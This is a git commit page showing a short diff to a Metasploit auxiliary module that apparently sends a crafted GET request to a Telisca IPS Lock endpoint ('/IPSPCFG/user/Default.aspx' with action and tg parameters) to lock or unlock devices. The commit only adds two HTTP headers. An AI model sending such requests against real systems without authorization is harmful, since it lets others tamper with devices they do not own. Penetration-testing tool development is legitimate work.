Update telisca_ips_lock_control.rb
commit the changes mad by sinn3r and replace headers on lock and unlockbug/bundler_fix
parent
8fb2e97a47
commit
3d04f405b4
|
@ -87,6 +87,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/IPSPCFG/user/Default.aspx',
|
||||
'headers' => {
|
||||
'Connection' => 'keep-alive',
|
||||
'Accept-Language' => 'en-US,en;q=0.5'
|
||||
},
|
||||
'vars_get' => {
|
||||
'action' => 'DO',
|
||||
'tg' => 'L',
|
||||
|
|
Loading…
Reference in New Issue